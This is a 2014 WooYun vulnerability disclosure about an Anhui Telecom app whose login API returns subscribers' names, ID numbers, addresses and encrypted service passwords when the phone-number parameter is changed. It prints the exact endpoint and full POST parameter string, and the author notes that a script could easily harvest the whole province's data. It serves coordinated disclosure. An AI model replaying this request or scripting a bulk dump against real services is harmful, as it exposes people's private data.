当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-066601

漏洞标题:安徽电信app用户验证不严导致可更改参数查看全省电信手机机主所有信息包括加密后的服务密码

相关厂商:安徽电信

漏洞作者: 小螺号

提交时间:2014-06-29 09:44

修复时间:2014-08-13 09:46

公开时间:2014-08-13 09:46

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-29: 细节已通知厂商并且等待厂商处理中
2014-07-04: 厂商已经确认,细节仅向厂商公开
2014-07-14: 细节向核心白帽子及相关领域专家公开
2014-07-24: 细节向普通白帽子公开
2014-08-03: 细节向实习白帽子公开
2014-08-13: 细节向公众公开

简要描述:

用户验证不严导致可更改参数查看全省电信手机机主所有信息,姓名,邮箱,备用联系人号码,家庭住址,身份证号码,包括加密后的服务密码等好多信息

详细说明:

问题出在安徽电信的一款app上,名为 安徽掌上10000,通过对该app抓包,分析,在打开软件的时候,app会发送一个post请求到服务端,请求机主个人信息,没有做验证,直接改post数据包中的号码参数就可以查看全省的电信手机用户的所有个人信息。因为时间原因没有去验证是否可以深入充值话费等操作,后期在去渗透。为了共建和谐社会,我就不准备脱裤了,不然写个脚本可以很轻松的把全省的手机号码匹配出个人信息并且入库的。唉 还是算了 啥都不说了 请叫我雷锋。还请乌云网给我个邀请码。

漏洞证明:

http://202.102.221.75:8110/palmhall/client/base/api_defaultLogin.action
serviceNbr参数可以改,获取机主所有个人信息,以下是POST参数
serviceCode=FUNC01001&serviceNbr=这里可以填安徽电信手机号码&latnId=551&loginType=4&passwordType=0&password=&clientVersion=10000&channel=&c_imei=99000520673338&c_imsi=460031266886240&c_os=_android4.1&c_model=mi_2sc_android&c_version=1.0.3.0&c_clientID=57e47be8c76ab10b8ee8ffcdca6a03e9&c_encrypt=20c2236c65ee425964a958ba197e0916&c_city=551&c_username=&c_userType=public&c_feeType=0&c_sessionID=&c_channel=&c_clientVersion=10000

.PNG


说明下,随机找的号码,因为是公司办理的号码 所以没有身份证号码。

修复方案:

app需要用户信息验证方可登录,与服务端通信用加密数据。

版权声明:转载请注明来源 小螺号@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2014-07-04 08:33

厂商回复:

CNVD确认并复现所述情况(需有安徽本地号码及相关情况),已经转由CNCERT直接通中国电信集团公司,同时同步下发给了CNCERT安徽分中心处置。按信息泄露风险评分,rank 11

最新状态:

暂无


漏洞评价:

评论

  1. 2014-06-29 09:58 | hacker@sina.cn ( 普通白帽子 | Rank:288 漏洞数:27 | ANONYMOUS)

    哎呦我cao

  2. 2014-06-29 15:31 | M4sk ( 普通白帽子 | Rank:1199 漏洞数:319 | 国内信息安全任重而道远,还需要厂商和白帽...)

    还好我不用手机